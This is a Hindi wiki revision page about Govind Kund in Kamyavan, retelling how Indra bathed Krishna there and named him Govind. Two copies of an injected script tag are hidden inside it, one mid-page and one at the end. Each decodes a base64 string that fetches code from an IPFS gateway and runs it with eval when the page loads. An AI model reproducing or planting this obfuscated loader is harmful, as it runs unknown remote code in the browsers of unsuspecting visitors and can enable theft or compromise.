Difference between revisions of "गोविन्द कुण्ड काम्यवन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (1 अवतरण)
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
Line 3: Line 3:
 
अपनी पूजा बन्द तथा [[गोवर्धन]] की पूजा प्रचलित होते देखकर क्रोधित [[इन्द्र|इन्द्रदेव]] ने ब्रजवासियों को नष्ट–भ्रष्ट करने के लिए सात दिनों तक मूसलाधार वर्षा एवं वज्रपात करवाया । किन्तु, अपने कार्य में असफल रहे । अन्त में [[ब्रह्मा]] जी के परामर्श से अपना अपराध क्षमा कराने के लिए सुरभी देवी को साथ लेकर यहाँ श्री [[कृष्ण]] का [[अभिषेक]] किया तथा गो, गोप और [[ब्रज]] सबका आनन्दवर्धक और पोषक होने के कारण गोविन्द नामकरण किया । तभी से कृष्ण का एक नाम गोविन्द हुआ । श्री गोविन्द का नामकरण और अभिषेक होने के कारण इस स्थल का नाम गोविन्द कुण्ड हुआ । श्री [[वज्रनाभ]] ने इस लीला की स्मृति के लिए इस कुण्ड की स्थापना की थी ।  
 
अपनी पूजा बन्द तथा [[गोवर्धन]] की पूजा प्रचलित होते देखकर क्रोधित [[इन्द्र|इन्द्रदेव]] ने ब्रजवासियों को नष्ट–भ्रष्ट करने के लिए सात दिनों तक मूसलाधार वर्षा एवं वज्रपात करवाया । किन्तु, अपने कार्य में असफल रहे । अन्त में [[ब्रह्मा]] जी के परामर्श से अपना अपराध क्षमा कराने के लिए सुरभी देवी को साथ लेकर यहाँ श्री [[कृष्ण]] का [[अभिषेक]] किया तथा गो, गोप और [[ब्रज]] सबका आनन्दवर्धक और पोषक होने के कारण गोविन्द नामकरण किया । तभी से कृष्ण का एक नाम गोविन्द हुआ । श्री गोविन्द का नामकरण और अभिषेक होने के कारण इस स्थल का नाम गोविन्द कुण्ड हुआ । श्री [[वज्रनाभ]] ने इस लीला की स्मृति के लिए इस कुण्ड की स्थापना की थी ।  
  
==सम्बंधित लिंक==
+
==संबंधित लेख==
 
{{ब्रज के दर्शनीय स्थल}}
 
{{ब्रज के दर्शनीय स्थल}}
  

Revision as of 14:16, 14 September 2010

40px panna banane ki prakriya mean hai. ap isako taiyar karane mean sahayata kar sakate haian.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

apani pooja band tatha govardhan ki pooja prachalit hote dekhakar krodhit indradev ne brajavasiyoan ko nasht–bhrasht karane ke lie sat dinoan tak moosaladhar varsha evan vajrapat karavaya . kintu, apane kary mean asaphal rahe . ant mean brahma ji ke paramarsh se apana aparadh kshama karane ke lie surabhi devi ko sath lekar yahaan shri krishna ka abhishek kiya tatha go, gop aur braj sabaka anandavardhak aur poshak hone ke karan govind namakaran kiya . tabhi se krishna ka ek nam govind hua . shri govind ka namakaran aur abhishek hone ke karan is sthal ka nam govind kund hua . shri vajranabh ne is lila ki smriti ke lie is kund ki sthapana ki thi .

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>